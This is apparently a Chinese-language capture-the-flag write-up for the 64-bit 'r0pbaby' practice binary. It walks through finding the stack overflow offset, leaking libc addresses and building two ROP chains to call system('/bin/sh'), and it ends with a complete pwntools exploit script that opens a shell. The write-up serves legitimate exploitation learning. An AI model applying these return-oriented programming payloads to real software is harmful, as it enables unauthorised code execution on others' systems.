pwn练习-r0pbaby

经典的rop利用题目
作为一枚菜鸡，希望能从基础开始多学点东西
首先file命令查看文件类型为64位程序

image.png

用checksec查看开启的保护，可以看到，开启了堆栈不可执行、地址分布随机化

image.png

执行程序，有以下这些选项

image.png

选项1给出libc的地址
选项2给出libc其中一个函数的地址
选项3可以向栈中输入小于1024的任意数据

首先测试溢出点
通过peda自带的pattern_create和pattern_offset进行溢出填充位数判断

image.png

image.png

image.png

可以得到溢出填充位为8字节，之后紧接着就是ret的地址，可以进行覆盖
在这里一般思路就是覆盖为system或者其他可以执行系统命令的函数地址，使得可以getshell
需要注意的是，64位系统中通过寄存器传参，函数传参顺序是RDI,RSI,RDX,RCX,R8,R9
调用system等函数时需要先给RDI寄存器赋值参数内容'/bin/sh'
使得最后执行system('/bin/sh')，因此需要构造栈布局
这里有两种ROP的利用方法

image.png

0x01

首先是考虑先赋值RDI内容为'/bin/sh'，之后再调用system函数
因此在这里需要找到gaget

image.png

这样我们的payload如下所示：

payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)

ret到pop rid ; ret的地址进行执行，将栈中sh_addr（'/bin/sh'的地址）传到RDI寄存器，接着ret到system_addr（sysem函数的地址）执行shell

0x02

还可以通过找到先pop寄存器，然后直接call寄存器的gaget来利用

image.png

这样的利用栈布局就如下payload所示

payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr)

ret到pop rax ; pop rdi ; call rax，将栈中system_addr传到RAX寄存器，将sh_addr传到RDI寄存器，之后直接CALL RAX来执行shell

payload和栈布局找好了，接下来就是写脚本利用了
还需要得到system在libc中的地址和'/bin/sh'字符串的地址
而'/bin/sh'在libc中已经存在了，可以通过Winhex查找，也可以通过IDA查找，这里注意，找到的是offset address

image.png

image.png

在IDA中按shift+f12，再通过ctrl+f搜索也可以找到

image.png

system的内存加载地址可以通过程序的选项2直接获取，再通过system在libc中固定的偏移地址，就可以得到libc的实际加载地址，并且能够获得其他所有函数和'/bin/sh'的实际加载地址。可以使用pwntools工具来获取offset address

from pwn import *
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
system_offset = libc.symbols['system']
p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")

system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)

拿到system的实际地址和偏移地址offset addr之后，就可以拿到'/bin/sh'的实际地址

sh_addr = system_addr + sh_offset - system_offset

最后system和'/bin/sh'的地址都拿到，两种payload都可以生效

image.png

image.png

from pwn import *

p = process("./r0pbaby")
elf = ELF("r0pbaby")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

system_offset = libc.symbols['system']
sh_offset = 0x179ef5

bss_addr = elf.bss()
pop_rdi_ret_offset = 0x00000000000208ef
ppc_addr_offset = 0x00000000000f53eb

p.recvuntil(": ")
p.sendline("1")
libc_addr = p.recvline().split(": ")[1].strip("\n")
libc_addr = long(libc_addr,16)
print "libc_addr:%x" % libc_addr

p.recvuntil(": ")
p.sendline("2")
p.recvuntil(": ")
p.sendline("system")

system_addr = p.recvline().split(": ")[1].strip("\n")
system_addr = long(system_addr,16)
sh_addr = system_addr + sh_offset - system_offset
pop_rdi_ret = system_addr + pop_rdi_ret_offset - system_offset
ppc_addr = system_addr + ppc_addr_offset - system_offset
print "system_addr:%x" % system_addr
print "base_addr:%x" % (system_addr - system_offset)

p.recvuntil(": ")
p.sendline("3")
p.recvuntil(": ")


#payload = 'A'*8 + p64(ppc_addr) + p64(system_addr) + p64(sh_addr) 
payload = 'A'*8 + p64(pop_rdi_ret) + p64(sh_addr) + p64(system_addr)
length = str(len(payload))
print length
print payload
p.sendline(length)
p.sendline(payload)
p.recv()

p.interactive()

ps:

一开始写脚本直接用选项1的地址做libc基地址来加上偏移，发现怎么都是错的
选项1给出的地址不是libc的基地址，需要用选项2的函数地址泄露来算出libc的基地址